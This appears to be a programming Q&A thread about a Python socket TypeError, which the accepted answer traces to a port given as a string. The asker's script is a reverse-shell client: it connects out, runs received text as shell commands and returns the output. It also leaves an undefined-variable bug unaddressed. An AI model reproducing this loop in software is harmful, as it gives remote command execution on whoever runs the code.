# Python Socket getattr requires integer

Tags: python, sockets, networking

I'm trying to use the socket object in one of my python codes and it fails at this line:

```
#!/usr/bin/python

import subprocess,socket

HOST = '127.0.0.1'
PORT = '443'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))
s.send('Yo')

while 1:
    data = s.recv(1024)
    if data == "quit": break

    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    stdoutput1 = proc.stdout.read() + proc.stderr.read()

    s.send(stdoutput)

s.send('Bye')
s.close()
```

It fails at: `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`

```
  File "C:\Python27\lib\socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
TypeError: an integer is required
```

It's telling me an integer is required in the parameters when I can't see why it would be. It calls this method from socket.py:

```
def meth(name,self,*args):
    return getattr(self._sock,name)(*args)
```

Comment: Please include the *full traceback*, not just the last few lines. Are you sure it is the `socket.socket(...)` call and not the `s.connect()` call? A port number must be an integer, you gave a string instead.

Comment: The `getattr()` call is not the issue here; that's just a wrapper for the C implementation, which is also why the traceback stops. It is the `(*args)` portion (the C method call) that is raising the exception, which is why it is also more likely to be the `socket.connect()` call that throws it.

Answer (score 1, accepted):

You have misunderstood the error message, and are looking at the wrong line. It is the `s.connect()` call that fails:

```
>>> import socket
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(('127.0.0.1', '443'))
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Users/mjpieters/Development/Library/buildout.python/parts/opt/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
TypeError: an integer is required
```

Note that it is **not** the `socket.socket()` call that failed here, it is the `s.connect()` call instead, because `'443'` is not a valid port number.

Port numbers *must* be integers, not strings; correct your `PORT` variable:

```
PORT = 443   # make this an integer
```

With that change connecting works (provided the port is connectable):

```
>>> s.connect(('127.0.0.1', 443))
```